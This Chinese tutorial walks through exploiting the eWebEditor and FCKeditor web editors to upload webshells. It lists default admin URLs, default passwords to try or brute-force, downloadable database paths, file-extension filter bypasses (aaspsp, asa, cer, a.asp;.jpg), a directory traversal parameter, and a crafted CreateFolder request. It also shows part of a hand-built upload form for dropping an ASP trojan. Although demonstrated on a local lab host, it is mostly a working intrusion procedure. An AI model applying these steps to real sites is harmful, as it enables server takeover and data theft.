html编辑器渗透,渗透测试之编辑器漏洞与旁注、跨目录、跨库、CDN绕过

常用的编辑器

常见的编辑器有Ewebeditor  fckeditor  CKeditor kindeditor

1.Ewebeditor

测试环境用的是eWebEditor_v216_Free版本  可以自己去网上下载对应的版本搭建本地环境

利用核心

默认后台：www.xxxx.com/ewebeditor/admin_login.asp

默认数据库：ewebeditor/db/ewebeditor.mdb

默认账号密码：admin admin/admin888

利用过程

常用入侵Ewebeditor 编辑器的步骤如下

1.首先访问默认管理页面看是否存在

默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp(其他语言改后戳,这里以asp为例) 。

2.默认管理员账户密码

如果默认管理页面存在  就用默认账户密码登录  默认账户密码为  admin   admin888  常用的密码还有admin admin999 admin1 admin000 之类的。  可以爆破一下

3.默认数据库地址

如果密码不是默认的  就去尝试下载默认的数据库

默认数据库路径为:ewebeditor/db/ewebeditor.mdb 常用数据库路径为:ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb 等等。

很多管理员经常把数据库的后缀改成 asp asa  可以直接用迅雷下载下来

如果默认账户密码正确 登录到后台以后

在图片类型这里加入asa|cer|asp|aaspsp这些后缀名

如果asp被过滤掉  可以用aaspsp后缀来绕过 如果遇到一个管理员有安全意识的，从代码里，把.asp .asa .cer .cdx 都完全禁止了，我们也可以用.asasaa 后缀来突破。

asa cer后缀在IIS6.0平台解析为asp执行

Aaspsp：绕过过滤过滤asp aaspsp=》asp

找到刚刚添加的样式 点击工具栏 开始添加按钮

先新增一个工具栏  再点按钮设置

找到插入或修改图片 点右箭头 添加到已选按钮框内  点击保存设置   换一个低版本的IE浏览器   访问编辑器就可以上传图片了   低版本的编辑器是不支持高版本的浏览器的

再返回样式管理   找到刚才设置的那个样式  点击预览  这里就要使用低版本的IE 否则是加载不出来按钮的

高版本浏览器

上图就是高版本浏览器访问低版本编辑器 就是这样  啥也点不了

低版本IE

上图就是低版本的IE  可以插入内容 点击上传图片按钮等等

多版本IE集成浏览器  IETester

这边已经设置好可以上传cerasp等后缀文件

直接上传一个asp的马就可以

上传好之后点代码  这块千万不要点查看源文件 查看源文件啥也查看不到

直接访问上传的webshell地址

2.目录遍历

第一步点上传文件管理   随便选择一个样式目录

在id=xx后面加上&dir=../

直接可以遍历目录  下载文件

由于目录遍历漏洞存在2.8.0  我这个版本较低  没有  就不演示了

3.寻找前人入侵痕迹

如何判断有前人入侵过了??下载好数据库之后查看他的eWebEditor_style表中的S_ImageExt字段是否有被人添加过什么。

使用下面的语句进入突破:

ewebeditor.asp?ID=xx&style=yy

其中的id=xx就是被修改过的那条记录的id，而yy就是S_name字段的名字。

例如这里就修改成: ewebeditor.asp?ID=54&style=testckse 去访问图片控件就出来了。。

4.文件上传漏洞

ewebeditor asp版 2.1.6 上传漏洞利用程序----

name=myform enctype="multipart/form-data">

type=file name=uploadfile size=100>

type=submit value=Fuck>

保存上面代码到HTML  直接上传cer格式木马

正常是这个页面   但是没有上传按钮   自己写一个上传按钮

上传成功之后会跳到上面黑黑的页面

右键查看源代码在最下面会看到上传上去的文件名称

完结....................

FCKeditor编辑器漏洞利用

先访问这个页面查看编辑器版本/_whatsnew.html

常用上传地址FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

由于这里用的是2.5的版本所以下面这条语句能用http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

先试试解析漏洞 上传一个a.asp;.png试一下

前面的.被过滤掉了

再试试二次上传

第一次上传：qq.asp;.jpg ==》qq_asp;.jpg

第二次上传：qq.asp;.jpg ==》qq_asp;.jpg (不满足命名要求)

可能出现第二次命名为qq.asp;.(1).jpg

还是不行

创建文件夹也没用

执行以下地址就能成功创建文件夹/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=xx.asp

这又是为什么了????手动不能创建，而通过以上地址就能成功创建了，让我们来对比下，手动创建和通过以上地址创建的一个区别。

漏洞地址：

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=x.asp

手工新建：

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp

原因：

CurrentFolder：当前文件夹 未进行过滤(这个文件夹下的没有过滤)

NewFolderName：新建文件名 进行了过滤

这就是为什么通过上面地址能创建，而手动却不能创建的一个原因，然后我们再上传6.asp;.jpg到fendo.asp文件下看是否成功解析。

随便上传个一句话

然后对照服务器那边拼接上传路径